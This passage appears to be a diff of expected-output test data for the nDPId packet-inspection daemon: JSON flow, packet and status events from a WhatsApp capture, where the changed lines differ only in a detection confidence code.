-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079242727,"flow_last_seen":1655079242898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655078417966,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655089030478,"flow_last_seen":1655089030643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655089030643,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655078415178,"flow_last_seen":1655078415507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079015860,"flow_last_seen":1655079016137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079242727,"flow_last_seen":1655079242898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655078417966,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":474,"packets-processed":473,"total-skipped-flows":0,"total-l4-payload-len":38585,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":60,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":60,"total-idle-flows":58,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":402,"global_ts_msec":1655090233457} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655090233457,"flow_last_seen":1655090233457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655090233457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1655090233457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655090233457,"pkt":"eJS0JASgYDjgxTWgCABFAAA8YMVAAD8GoXzAqAJkszzDMbfuFGYjjxw1AAAAAKAC\/\/8ccQAAAgQFtAQCCArHvx46AAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1655090233489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655090233489,"pkt":"eJS0JASgYDjgxTWgCABFAAA0YMZAAD8GoYPAqAJkszzDMbfuFGYjjxw2tsj\/nIAQAKzs8QAAAQEICse\/HlqH9x8U"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1655090233571,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655090233571,"pkt":"eJS0JASgYDjgxTWgCABFAAA4YMdAAD8GoX7AqAJkszzDMbfuFGYjjxw2tsj\/nIAYAKynTQAAAQEICse\/Hq2H9x8URUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655090233457,"flow_last_seen":1655090233603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655090233603,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655090233457,"flow_last_seen":1655090233603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655090233603,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":482,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":482,"packets-processed":481,"total-skipped-flows":0,"total-l4-payload-len":38908,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":61,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":61,"total-idle-flows":58,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":408,"global_ts_msec":1655091294583} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655091294583,"flow_last_seen":1655091294583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655091294583,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1655091294583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655091294583,"pkt":"eJS0JASgYDjgxTWgCABFAAA8\/r9AAD8GA4LAqAJkszzDMcAeFGacobJEAAAAAKAC\/\/\/yvwAAAgQFtAQCCApxiYbPAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1655091294836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655091294836,"pkt":"eJS0JASgYDjgxTWgCABFAAA0\/sBAAD8GA4nAqAJkszzDMcAeFGacobJFhNtvm4AQAIBe2QAAAQEICnGJh9AM9r+2"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1655091294836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655091294836,"pkt":"eJS0JASgYDjgxTWgCABFAAA4\/sFAAD8GA4TAqAJkszzDMcAeFGacobJFhNtvm4AYAIAZggAAAQEICnGJh9YM9r+2RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655091294583,"flow_last_seen":1655091294939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655091294939,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655091294583,"flow_last_seen":1655091294939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655091294939,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":489,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":489,"packets-processed":488,"total-skipped-flows":0,"total-l4-payload-len":39230,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":62,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":62,"total-idle-flows":58,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":414,"global_ts_msec":1655096063383} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655096063383,"flow_last_seen":1655096063383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655096063383,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1655096063383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655096063383,"pkt":"eJS0JASgYDjgxTWgCABFAAA80GdAAD8GMdrAqAJkszzDMcBQFGYzpQPcAAAAAKAC\/\/+30QAAAgQFtAQCCApxjNjtAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1655096063418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655096063418,"pkt":"eJS0JASgYDjgxTWgCABFAAA00GhAAD8GMeHAqAJkszzDMcBQFGYzpQPdMmkwzoAQAIAjpQAAAQEICnGM2RDAwp5N"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1655096063425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655096063425,"pkt":"eJS0JASgYDjgxTWgCABFAAA40GlAAD8GMdzAqAJkszzDMcBQFGYzpQPdMmkwzoAYAIDeTAAAAQEICnGM2RfAwp5NRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655096063383,"flow_last_seen":1655096063459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655096063459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655085444940,"flow_last_seen":1655085445318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655096063826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655096063383,"flow_last_seen":1655096063459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655096063459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655085444940,"flow_last_seen":1655085445318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655096063826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":497,"packets-processed":496,"total-skipped-flows":0,"total-l4-payload-len":39512,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":63,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":63,"total-idle-flows":59,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":421,"global_ts_msec":1655097851208} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655097851208,"flow_last_seen":1655097851208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655097851208,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1655097851208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655097851208,"pkt":"eJS0JASgYDjgxTWgCABFAAA8hVJAAD8GfO\/AqAJkszzDMbj2FGbdMghiAAAAAKAC\/\/9ZggAAAgQFtAQCCAo4P8nQAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1655097851243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655097851243,"pkt":"eJS0JASgYDjgxTWgCABFAAA0hVNAAD8GfPbAqAJkszzDMbj2FGbdMghj2gcbf4AQAIDKFgAAAQEICjg\/yfKnyyA1"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1655097851444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655097851444,"pkt":"eJS0JASgYDjgxTWgCABFAAA4hVRAAD8GfPHAqAJkszzDMbj2FGbdMghj2gcbf4AYAICEGAAAAQEICjg\/yp+nyyA1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655097851208,"flow_last_seen":1655097851476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655097851476,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655090233457,"flow_last_seen":1655090233805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655089030478,"flow_last_seen":1655089030857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655097851208,"flow_last_seen":1655097851476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655097851476,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655090233457,"flow_last_seen":1655090233805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655089030478,"flow_last_seen":1655089030857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":505,"packets-processed":504,"total-skipped-flows":0,"total-l4-payload-len":39806,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":64,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":64,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":429,"global_ts_msec":1655099328045} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655099328045,"flow_last_seen":1655099328045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655099328045,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 